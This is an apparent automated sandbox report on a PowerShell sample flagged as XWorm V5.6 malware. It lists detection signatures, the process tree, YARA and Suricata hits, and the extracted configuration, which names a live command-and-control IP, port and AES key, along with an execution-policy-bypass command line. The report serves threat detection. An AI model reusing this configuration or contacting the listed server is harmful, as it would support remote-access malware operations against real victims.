Windows Analysis Report
NLXwvLjXPh.ps1

Overview

General Information

Sample name: NLXwvLjXPh.ps1 (renamed because original name is a hash value)
Original sample name: e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859.ps1
Analysis ID: 1577165
MD5: 665d34b878bf82d6b6078c1a20cda896
SHA1: a1c03b8df6b114c5a9b557316868f06a2816f4c0
SHA256: e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859
Tags: 92-255-57-155, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 4084 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 64 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 3744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 764 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
    00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x1d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x1dd8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1e68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x1c20:$cnc4: POST / HTTP/1.1
    Process Memory Space: RegSvcs.exe PID: 64 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
      Process Memory Space: RegSvcs.exe PID: 64 | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      • 0x34d79:$s8: Win32_ComputerSystem
      • 0x34e51:$s8: Win32_ComputerSystem
      • 0x60a5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6161:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x61eb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x5f73:$cnc4: POST / HTTP/1.1

      System Summary

      Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", ProcessId: 3916, ProcessName: powershell.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", ProcessId: 3916, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:17:48.911994+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:49.007759+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:50.844659+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:50.996553+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.156239+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.347326+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.468916+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:52.875960+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:33.902091+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:15:45.771661+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:15:57.674231+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:09.580469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:21.486706+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:23.800469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.060029+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.249538+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.341618+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:25.255032+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:25.503746+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:27.295911+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.083085+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.269318+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.562810+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:29.897905+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.164514+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.213412+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.359257+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.404817+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.524481+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.646166+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.937571+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.133889+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.362180+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.481784+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.186441+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.417459+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.697480+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.835284+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.997584+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:34.117799+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:34.240500+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:35.482478+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:35.822385+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.010043+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.130660+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.490754+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.781610+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:38.748427+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:38.909410+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.029084+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.148733+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.268439+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:41.205722+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:43.072733+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:43.253090+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:44.248195+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:44.893943+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.069824+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.207454+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.492026+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.049893+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.244129+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.364366+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:48.867349+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:49.070621+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:50.781213+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:50.959334+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:51.321655+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:51.735444+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.138080+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.361065+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.644963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:54.391343+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:54.616929+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:55.862312+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:56.530712+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:56.909860+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:57.089201+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:57.369442+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.298171+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.726092+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.969995+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:59.107296+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:00.294866+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:00.971617+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.537876+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.642038+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.703951+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.823599+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:02.961974+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.082053+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.201778+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.326101+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.613897+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.773877+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:04.749398+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.038465+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.094986+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.321570+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.443227+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.649883+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:06.440028+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:06.824374+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.391954+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.624966+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.747170+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.535601+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.774991+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.901928+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:11.157785+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:11.597907+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:12.813169+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:12.934095+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:13.189536+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:13.608910+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.592855+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.712473+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.888749+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.013724+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.726905+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.982984+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:16.574935+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:18.797777+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:19.497918+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:20.267114+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:20.872027+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:21.142643+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:24.758271+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:25.074712+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:25.572080+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:26.719925+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.032137+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.151957+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.460864+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:28.978078+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.018032+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.098068+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.217880+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.337825+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.522691+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.869548+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.473988+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.661142+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.796469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.563436+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.897617+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.961063+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:33.241746+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:33.565993+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.417678+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.611421+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.850456+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.216700+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.408863+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.657022+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.782028+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:36.105385+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:36.225137+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.440624+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.560192+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.679847+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.869345+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:38.568424+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:38.764531+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.110504+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.345812+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.957963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:41.150302+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.032862+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.672845+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.933811+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:44.536859+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.190208+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.390835+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.514056+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.513963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.701245+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.821964+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.941647+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:47.110123+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:47.229968+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.696917+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.819401+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.942109+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:49.062235+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:49.244958+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:50.845497+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.158128+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.308919+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.466955+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.628967+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:55.454351+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:15:28.448524+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:16:23.488331+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP

      AV Detection

      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
      Source: NLXwvLjXPh.ps1 | ReversingLabs: Detection: 15%
